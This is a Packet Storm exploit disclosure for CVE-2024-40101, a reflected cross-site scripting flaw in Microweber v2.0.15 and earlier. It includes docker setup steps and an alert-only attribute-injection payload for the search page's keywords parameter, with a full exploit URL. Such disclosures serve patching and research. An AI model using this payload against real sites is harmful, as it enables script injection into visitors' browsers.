Lucene search
Prerak MittalPACKETSTORM:179921HistoryAug 06, 2024 - 12:00 a.m.
Microweber 2.0.15 Cross Site Scripting
2024-08-0600:00:00
Prerak Mittal
packetstormsecurity.com
70
`# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)
# Date: 16.07.2024
# Exploit Author: Prerak Mittal
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15
# Version: <=v2.0.15
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-40101
# Description:
## App Installation:
1. Clone the repository and build the application using docker:
```
git clone -b v2.0.15 https://github.com/microweber/microweber.git
cd microweber
docker compose up -d
```
2. Visit http://localhost
3. Follow along the UI installation process.
## Steps to reproduce:
1. Visit http://localhost/search
2. Insert the below payload in `keywords` parameter:
"onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"
Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22
3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.
`
Related
osv
osv
CVE-2024-40101
2024-08-06 14:16:04
Microweber Reflected Cross-site scripting (XSS) vulnerability
2024-08-06 15:30:54
veracode
veracode
Cross-site Scripting (XSS)
2024-08-07 08:04:53
vulnrichment
vulnrichment
CVE-2024-40101
2024-08-06 00:00:00
github
github
Microweber Reflected Cross-site scripting (XSS) vulnerability
2024-08-06 15:30:54
zdt
zdt
Microweber 2.0.15 Cross Site Scripting Vulnerability
2024-08-07 00:00:00
cvelist
cvelist
CVE-2024-40101
2024-08-06 00:00:00
nvd
nvd
CVE-2024-40101
2024-08-06 14:16:04
cve
cve
CVE-2024-40101
2024-08-06 14:16:04